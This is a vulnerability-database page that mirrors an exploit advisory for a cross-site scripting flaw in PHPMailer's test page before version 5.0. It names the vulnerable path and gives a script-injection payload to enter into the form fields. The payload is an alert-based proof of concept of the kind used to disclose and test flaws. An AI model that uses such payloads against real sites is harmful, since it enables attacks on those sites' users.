PHPMailer Test Page < 5.0 Cross-Site-Scripting - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1214910 漏洞类型
发布时间 2018-07-07 更新时间 2018-07-07
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2018070071
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
# Exploit Title: PHPMailer Test Page < 5.0 Cross-Site-Scripting
# Date: 2018-07-06 
# Exploit Author: Omba
# Vendor Homepage: https://github.com/PHPMailer
# Software Link: https://github.com/PHPMailer/PHPMailer
# Version: [5.0]
# CVE: N/A
# Tested on: MacOS High Sierra / Linux Mint / Windows 10
  
# Vulnerable Parameter Type: GET 
# Vulnerable Parameter: www.example.com/phpmailer/test_script/ 
  
# Proof of Concepts:
  
www.example.com/phpmailer/test_script/
  
fill in all the fields "Mail Details"

Payload: “><script>alert(/Xss-By-Omba/)</script>

and click Submit.